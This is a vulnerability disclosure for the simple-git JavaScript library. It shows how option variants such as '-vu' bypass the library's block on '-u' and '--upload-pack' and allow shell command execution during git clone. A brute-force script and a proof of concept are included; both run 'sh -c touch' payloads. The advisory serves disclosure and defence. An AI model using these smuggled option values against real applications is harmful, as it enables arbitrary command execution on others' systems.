+ "details": "### Summary\n\nsimple-git enables running native Git commands from JavaScript. Some commands accept options that allow executing another command; because this is very dangerous, execution is denied unless the user explicitly allows it. This vulnerability allows a malicious actor who can control the options to execute other commands even in a “safe” state where the user has not explicitly allowed them. The vulnerability was introduced by an incorrect patch for CVE-2022-25860. It is *likely* to affect all versions prior to and including 3.28.0.\n\n\n### Detail\n\nThis vulnerability was introduced by an incorrect patch for CVE-2022-25860.\n\nIt was reproduced in the following environment:\n\n```\n\nWSL Docker\nnode: v22.19.0\ngit: git version 2.39.5\nsimple-git: 3.28.0\n\n````\n\nThe issue was not reproduced on Windows 11.\n\nThe `-u` option, like `--upload-pack`, allows a command to be executed.\n\nCurrently, the `-u` and `--upload-pack` options are blocked in the file `simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts`.\n\n```ts\nfunction preventUploadPack(arg: string, method: string) {\n if (/^\\s*--(upload|receive)-pack/.test(arg)) {\n throw new GitPluginError(\n undefined,\n 'unsafe',\n `Use of --upload-pack or --receive-pack is not permitted without enabling allowUnsafePack`\n );\n }\n\n if (method === 'clone' && /^\\s*-u\\b/.test(arg)) {\n throw new GitPluginError(\n undefined,\n 'unsafe',\n `Use of clone with option -u is not permitted without enabling allowUnsafePack`\n );\n }\n\n if (method === 'push' && /^\\s*--exec\\b/.test(arg)) {\n throw new GitPluginError(\n undefined,\n 'unsafe',\n `Use of push with option --exec is not permitted without enabling allowUnsafePack`\n );\n }\n}\n````\n\nHowever, the problem is that command option parsing is quite flexible.\n\nBy brute forcing, I found various options that bypass the `-u` check.\n\n```\n[\n '--u', '--u',\n '-4u', '-6u',\n '-lu', '-nu',\n '-qu', '-su',\n '-vu'\n]\n```\n\nAll of the above are three-character options that allow command execution. They enable execution even when `allowUnsafePack` is explicitly set to false.\n\nThe depressing fact is that the options I found are probably only a tiny fraction of all possible option formats that enable command execution. In addition to the `-u` option, there is also the `--upload-pack` option and others, and some of the options I found can probably be extended to arbitrary length. Considering this, the number of option variants that enable command execution is probably infinite.\n\nTherefore, I could not find an effective way to block all such cases. Personally, I think it is virtually impossible to block this vulnerability completely. To fully block it, one would have to faithfully emulate Git’s option parsing rules, and it’s doubtful whether that is feasible.\n\nJust in case, I’ll share the brute-force code I used to find options that enable command execution.\n\n```js\nconst fs = require('fs');\nconst simpleGit = require('simple-git');\n\nconst TMP_DIR = './pwned/';\nconst ITER = 256;\n\nfunction cleanTmpDir() {\n if (fs.existsSync(TMP_DIR)) {\n fs.rmSync(TMP_DIR, { recursive: true, force: true });\n }\n fs.mkdirSync(TMP_DIR, { recursive: true });\n}\n\nfunction getPwnedFiles() {\n const found = [];\n for (let i = 0; i < ITER; i++) {\n const fname1 = `${TMP_DIR}1_${i}`;\n const fname2 = `${TMP_DIR}2_${i}`;\n const fname3 = `${TMP_DIR}3_${i}`;\n if (fs.existsSync(fname1)) found.push(String.fromCharCode(i) + '-u');\n if (fs.existsSync(fname2)) found.push('-' + String.fromCharCode(i) + 'u');\n if (fs.existsSync(fname3)) found.push('-u' + String.fromCharCode(i));\n }\n return found;\n}\n\nasync function runTest(runIdx) {\n const git = simpleGit();\n // 1. `${~}-u` Pattern\n for (let i = 0; i < ITER; i++) {\n try {\n await git.clone('./testrepo1', './testrepo2', [String.fromCharCode(i) + '-u', `sh -c \\\"touch ${TMP_DIR}1_${i}\\\"`]);\n } catch {}\n }\n // 2. `-${~}u` Pattern\n for (let i = 0; i < ITER; i++) {\n try {\n await git.clone('./testrepo1', './testrepo2', ['-' + String.fromCharCode(i) + 'u', `sh -c \\\"touch ${TMP_DIR}2_${i}\\\"`]);\n } catch {}\n }\n // 3. `-u${~}` Pattern\n for (let i = 0; i < ITER; i++) {\n try {\n await git.clone('./testrepo1', './testrepo2', ['-u' + String.fromCharCode(i), `sh -c \\\"touch ${TMP_DIR}3_${i}\\\"`]);\n } catch {}\n }\n}\n\nasync function main() {\n cleanTmpDir();\n await runTest();\n\n const found = getPwnedFiles();\n \n console.log(found);\n}\n\nmain();\n```\n\n### PoC\n\nThe environment in which I succeeded is as follows. As long as the OS remains Linux, I suspect it will succeed reliably despite considerable variation in other factors.\n\n```\nWSL Docker\nnode: v22.19.0\ngit: git version 2.39.5\nsimple-git: 3.28.0\n```\n\n1.\n\nCreate any git repository inside the `testrepo1` folder. A very simple repository with a single commit and a single file is fine.\n\n2.\n\nRun the following:\n\n```js\nconst { simpleGit } = require('simple-git');\n\nasync function main() {\n const git = await simpleGit({ unsafe: { allowUnsafePack: false } });\n await git.clone('./testrepo1', './testrepo2', [`-vu sh -c \\\"touch /tmp/pwned\\\"`]);\n}\n\nmain();\n```\n\nThis PoC explicitly configures `allowUnsafePack` to `false`. Of course, the same vulnerability occurs even without this option. An error is the expected behavior.\n\n3.\n\nCheck `/tmp` to confirm that `pwned` has been created.\nIf it failed, try replacing `-vu` with a different option from the list.\n\n### Impact\n\nThis vulnerability is *likely* to affect all versions prior to and including 3.28.0. This is because it appears to be a continuation of the series of four vulnerabilities previously found in simple-git (CVE-2022-24433, CVE-2022-24066, CVE-2022-25912, CVE-2022-25860).",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments